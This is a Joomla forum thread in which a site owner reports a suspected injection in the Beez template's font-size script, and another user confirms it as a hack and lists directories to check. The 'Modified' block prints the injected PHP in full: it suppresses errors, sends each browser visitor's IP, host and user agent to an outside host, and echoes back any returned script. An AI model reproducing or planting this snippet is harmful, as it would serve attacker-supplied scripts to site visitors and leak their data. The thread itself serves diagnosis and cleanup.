Anyone seen this code? (within Beez fontsize) maybe injected

Siddan · Post by **Siddan** » Mon Nov 03, 2014 4:36 pm

Hi
I just noticed a broken javascript code which messing up the layout a bit.
It was a while I visited the site so I have no idea for how long it has been there and I doubt it was anything I have put up. Not that I recognize anyways.

The php snippet with a javascript code is placed on the main template index.php file.
Uzing a modified Beez template where there is a font size script.
The php snippet is put just after the first joomla text INCREASE_SIZE.

I have removed the snippet and if the code weren´t broken I would never have spotted it, I assume. I cannot see any non-familiar code on the template page so I hope that was it.

Original

Code: Select all

<div id="fontsize">
				<script type="text/javascript">
				//<![CDATA[
					
					document.write('<a href="index.php" title="<?php echo JText::_('INCREASE_SIZE'); ?>" onclick="changeFontSize(2); return false;" class="larger"><?php echo JText::_('FONT_LARGER'); ?></a>');
					document.write('<a href="index.php" title="<?php echo JText::_('DECREASE_SIZE'); ?>" onclick="changeFontSize(-2); return false;" class="smaller"><?php echo JText::_('FONT_SMALLER'); ?></a>');
					document.write('<a href="index.php" title="<?php echo JText::_('RESET_SIZE'); ?>" onclick="revertStyles(); return false;" class="reset"><?php echo JText::_('FONT_RESIZE'); ?></a> ');
				//]]>
				</script>
			</div>  <!-- end Fontsize -->

Modified

Code: Select all

        	<div id="fontsize">
				<script type="text/javascript">
				//<![CDATA[
					
					document.write('<a href="index.php" title="<?php echo JText::_('INCREASE_SIZE'); ?>
<?php
#e211e3#
error_reporting(0); ini_set('display_errors',0); $wp_e1 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_e1) && !preg_match ('/bot/i', $wp_e1))){
$wp_e091="http://"."error"."class".".com/class"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_e1);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_e091);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1e = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1e,1,3) === 'scr' ){ echo $wp_1e; }
#/e211e3#
?>" onclick="changeFontSize(2); return false;" class="larger"><?php echo JText::_('FONT_LARGER'); ?></a>');
					document.write('<a href="index.php" title="<?php echo JText::_('DECREASE_SIZE'); ?>" onclick="changeFontSize(-2); return false;" class="smaller"><?php echo JText::_('FONT_SMALLER'); ?></a>');
					document.write('<a href="index.php" title="<?php echo JText::_('RESET_SIZE'); ?>" onclick="revertStyles(); return false;" class="reset"><?php echo JText::_('FONT_RESIZE'); ?></a> ');
				//]]>
				</script>
			</div>  <!-- end Fontsize -->

Installation: Joomla 1.5.25

jackrabbit · Post by **jackrabbit** » Tue Nov 04, 2014 12:05 am

Yes that is definitely the work of hackers and it is most likely communicating with other files inserted elsewhere. You need to do some security checks on directories. Some likely directories where malicious files are placed are
images
cache
logs
tmp
components/com_content

The Joomla! Forum™

Anyone seen this code? (within Beez fontsize) maybe injected

Anyone seen this code? (within Beez fontsize) maybe injected

Re: Anyone seen this code? (within Beez fontsize) maybe inje